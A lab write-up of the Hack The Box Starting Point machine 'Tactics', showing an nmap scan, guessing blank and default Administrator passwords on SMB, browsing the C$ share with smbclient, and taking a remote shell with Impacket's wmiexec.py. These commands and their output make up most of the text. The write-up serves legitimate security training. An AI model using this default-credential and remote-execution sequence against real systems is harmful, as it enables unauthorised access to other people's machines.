Tactics Writeup

 July 18, 2022
Share: TwitterFacebookLinkedin

Introduction

This was a straight forward box. It was very similar to a previous Starting Point machine. Gain access to SMB via brute force. With valid credentials and Impacket I am able to get a semi-interactive shell on the box.

This wraps up Tier 1 machines. Next is Tier 2 and then on to some retired machines!

Initial Recon

Started with the standard nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ sudo nmap -sC -sV -oA Tactics/nmap $tgt
[sudo] password for crimson: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 20:20 CDT
Nmap scan report for 10.129.68.31
Host is up (0.050s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-28T01:20:51
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.50 seconds

There are a few ports open – RPC on 135, NetBIOS on 139, and SMB on 445.

Initial Access

SMB

The first thing I do when I see port 445 is try to list shares. With no intel I try the standard username and password combinations seen below. In this case it works and the standard Windows shares are listed. For more information regarding SMB check out the writeup for Dancing.

UsernamePassword
(blank)(blank)
Administrator(blank), administrator, admin, password
┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ smbclient -U 'Administrator' -L \\$tgt      
Enter WORKGROUP\Administrator's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.68.31 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$

Since I can list shares, I check to see if I can connect to one. And sure enough I can. From here I could navigate the file system and pull back things. But there is another popular tool I could use to achieve the same end state.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ smbclient -U 'Administrator' \\\\$tgt\\C$
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Wed Apr 21 10:23:49 2021
  Config.Msi                        DHS        0  Wed Jul  7 13:04:56 2021
  Documents and Settings          DHSrn        0  Wed Apr 21 10:17:12 2021
  pagefile.sys                      AHS 738197504  Fri May 27 20:15:10 2022
  PerfLogs                            D        0  Sat Sep 15 02:19:00 2018
  Program Files                      DR        0  Wed Jul  7 13:04:24 2021
  Program Files (x86)                 D        0  Wed Jul  7 13:03:38 2021
  ProgramData                        DH        0  Wed Apr 21 10:31:48 2021
  Recovery                         DHSn        0  Wed Apr 21 10:17:15 2021
  System Volume Information         DHS        0  Wed Apr 21 10:34:04 2021
  Users                              DR        0  Wed Apr 21 10:23:18 2021
  Windows                             D        0  Fri May 27 21:24:20 2022

                3774463 blocks of size 4096. 1158534 blocks available
smb: \> cd Users/Administrator/Desktop
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Thu Apr 22 02:16:03 2021
  ..                                 DR        0  Thu Apr 22 02:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 10:23:32 2021
  flag.txt                            A       32  Fri Apr 23 04:39:00 2021

                3774463 blocks of size 4096. 1158534 blocks available

Priv Esc

Impacket is a very popular tool that contains various scripts. In this scenario I used wmiexec.py which provides more functionality when compared to connecting via smbclient. The former allows me to run more commands as seen below.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ python3 /opt/impacket/examples/wmiexec.py Administrator@$tgt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is EEE0-FCDB

 Directory of C:\Users\Administrator\Desktop

04/22/2021  12:16 AM    <DIR>          .
04/22/2021  12:16 AM    <DIR>          ..
04/23/2021  02:39 AM                32 flag.txt
               1 File(s)             32 bytes
               2 Dir(s)   4,743,864,320 bytes free

C:\Users\Administrator\Desktop>whoami
tactics\administrator

C:\Users\Administrator\Desktop>